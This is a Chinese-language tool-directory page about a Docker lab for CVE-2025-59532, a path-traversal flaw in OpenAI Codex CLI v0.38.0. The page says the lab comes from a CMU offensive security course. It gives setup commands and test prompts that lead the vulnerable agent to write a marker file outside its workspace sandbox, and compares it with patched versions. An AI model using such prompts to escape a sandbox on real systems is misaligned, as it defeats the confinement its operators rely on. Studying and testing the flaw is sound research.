Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
cve-2025-59532-poc — 基于Docker的研究环境,用于分析CVE-2025-59532,这是OpenAI Codex CLI中的一个路径遍历漏洞,允许在预期工作区沙箱之外写入任意文件。属于CMU课程:2025年秋季18-739黑客与进攻性安全。 | Kitploit
工具/GitHubGitHub/baktistr/cve-2025-59532-poc
容器安全漏洞分析漏洞利用Web应用程序漏洞利用CTF渗透测试学习与教育实验室与实践
GitHubbaktistr/cve-2025-59532-poc

cve-2025-59532-poc

基于Docker的研究环境,用于分析CVE-2025-59532,这是OpenAI Codex CLI中的一个路径遍历漏洞,允许在预期工作区沙箱之外写入任意文件。属于CMU课程:2025年秋季18-739黑客与进攻性安全。

查看仓库
138个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2025-59532 Docker 环境

一个基于 Docker 的研究环境,用于分析 CVE-2025-59532(OpenAI Codex CLI 中的路径遍历漏洞),该漏洞允许在预期工作区沙箱之外写入任意文件。 属于卡内基梅隆大学 2025 年秋季课程:18-739 黑客与进攻安全

快速开始

克隆仓库

首先,克隆此仓库:

root@kitploit:~
git clone https://github.com/jjagielo/18739-CVE-Exploration.git
cd 18739-CVE-Exploration

或者使用 SSH:

root@kitploit:~
git clone [email protected]:jjagielo/18739-CVE-Exploration.git
cd 18739-CVE-Exploration

CVE 描述

CVE-2025-59532 是 OpenAI Codex CLI 工具中的一个路径遍历漏洞,攻击者可以绕过沙箱限制,在预期工作区目录之外写入文件。

漏洞详情

  • CVE ID:CVE-2025-59532
  • 受影响版本:Codex CLI v0.38.0 及更早版本
  • 漏洞类型:任意文件写入 / 路径遍历
  • 严重性:高
  • 攻击向量:攻击者可以构造提示词,使 Codex 将文件写入父目录(例如 ../exploit.txt),即使在启用 --sandbox workspace-write 的情况下也能逃逸工作区沙箱。
  • 影响:在系统目录中创建未授权文件,可能导致权限提升和容器安全边界受损。
  • 修复:在 v0.39.0 中通过改进路径验证和清理加以修复

工作原理

该漏洞利用工作区沙箱实现中的路径验证不足。当启用 workspace-write 沙箱模式时,Codex 应将文件操作限制在指定的工作区目录内。然而,在 v0.38.0 中,路径验证未能正确处理相对路径遍历序列(../),攻击者可以通过指示 AI 使用父目录引用来逃逸沙箱写入文件。

前提条件

  • 系统已安装 Docker
  • OpenAI API 密钥(从 https://platform.openai.com/api-keys 获取)
  • 对 Docker 和命令行操作有基本了解
  • Git(用于克隆仓库)

构建与运行

构建 Docker 镜像:

root@kitploit:~
docker build -t cve-2025-59532:latest .

运行容器:

root@kitploit:~
docker run -it --rm cve-2025-59532:latest

使用方法

此 Docker 环境包含三个版本的 Codex CLI:

  • codex38 - v0.38.0(易受攻击版本)
  • codex39 - v0.39.0(已修补版本)
  • codex50 - v0.50.0(最新版本)

配置 OpenAI API 密钥

进入容器后,只需在交互模式下运行 codex 并粘贴 API 密钥即可配置:

root@kitploit:~
codex

API 密钥将存储在 ~/.config/codex/auth.json 中,并会被所有 Codex 版本(codex38、codex39、codex50)使用。

查看版本

root@kitploit:~
codex38 --version  # 应显示 v0.38.0(易受攻击)
codex39 --version  # 应显示 v0.39.0(已修补)
codex50 --version  # 应显示 v0.50.0(最新)

测试漏洞

注意:工作区位于 /workspace/child。该漏洞允许写入 /workspace(父目录)。

测试易受攻击版本(v0.38.0):

root@kitploit:~
codex38 exec --sandbox workspace-write --skip-git-repo-check "在父目录中创建一个名为 'exploit_proof1.txt' 的文件,内容为 'CVE-2025-59532 POC'"

测试已修补版本(v0.39.0):

root@kitploit:~
codex39 exec --sandbox workspace-write --skip-git-repo-check "在父目录中创建一个名为 'exploit_proof2.txt' 的文件,内容为 'CVE-2025-59532 POC'"

测试最新版本(v0.50.0):

root@kitploit:~
codex50 exec --sandbox workspace-write --skip-git-repo-check "在父目录中创建一个名为 'exploit_proof3.txt' 的文件,内容为 'CVE-2025-59532 POC'"

验证利用结果:

root@kitploit:~
# 检查文件是否在沙箱之外创建(在 /workspace,而不是 /workspace/child)
ls -la /workspace/
cat /workspace/exploit_proof1.txt  # 如果 v0.38.0 易受攻击,则应存在
cat /workspace/exploit_proof2.txt  # 如果 v0.39.0 已修补,则不应存在
cat /workspace/exploit_proof3.txt  # 如果 v0.50.0 安全,则不应存在

# 检查当前工作区(应为空或仅包含测试文件)
pwd  # 应显示 /workspace/child
ls -la /workspace/child/

查看日志

查看 Codex 执行的详细调试日志:

root@kitploit:~
RUST_LOG=debug codex38 exec --sandbox workspace-write --skip-git-repo-check "在父目录中创建一个名为 'exploit_proof.txt' 的文件,内容为 'CVE-2025-59532 POC'"

调试日志将显示:

  • API 请求和响应
  • 路径验证尝试
  • 文件操作详情
  • 沙箱执行(或绕过)行为
下载工具